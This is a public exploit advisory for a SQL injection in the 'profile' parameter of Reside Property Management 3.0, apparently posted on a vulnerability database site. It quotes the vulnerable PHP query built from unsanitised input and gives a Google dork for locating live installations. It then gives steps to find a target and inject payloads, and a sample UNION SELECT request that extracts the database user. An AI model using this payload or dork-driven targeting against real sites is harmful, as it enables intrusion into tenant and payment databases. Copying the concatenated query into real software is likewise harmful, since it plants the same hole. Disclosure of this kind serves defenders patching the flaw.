Reside Property Management 3.0 profile SQL Injection

2020.06.30
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Reside Property Management 3.0 - 'profile' SQL Injection # Date: 2020-06-28 # Google Dork: "Copyright 2020 Reside Property Management" # Exploit Author: Ultra Security Team (Ashkan Moghaddas , AmirMohammad Safari) # Team Members: Behzad Khalifeh , Milad Ranjbar # Vendor Homepage: https://www.13plugins.com/product/reside-v3-rental-property-management-php-script/ # Version: v3.0 [Final Version] # Tested on: Windows/Linux # CVE: N/A .:: Description ::. RESIDE makes it easy to manage all of your tenants & properties, record payments, and keep everything accessible any time, from any computer or device. .:: Vulnerable File ::. profile.php .:: Vulnerable Code ::. - Line 21: $profile = $_GET['profile']; - Line 22: $adminsName = preg_replace('/-/', ' ', $profile); - Line 90: $sql = "SELECT * FROM admins WHERE adminName = '" . $adminsName . "'"; - Line 91: mysqli_query $result = mysqli_query($mysqli, $sql) or die ('-1' . mysqli_error()); .:: Proof Of Concept (PoC) ::. Step 1 - Find Your Target With the above Dork. Step 2 - Find profile.php File in Target Step 3 - Inject Your Payloads in profile parameter .:: Sample Request ::. localhost/reside-rental-property-management/Reside/profile.php?profile=-21%27+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,user(),11,12,13,14,15,16,17,18,19,20,21,22,user(),24,25,26%23


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top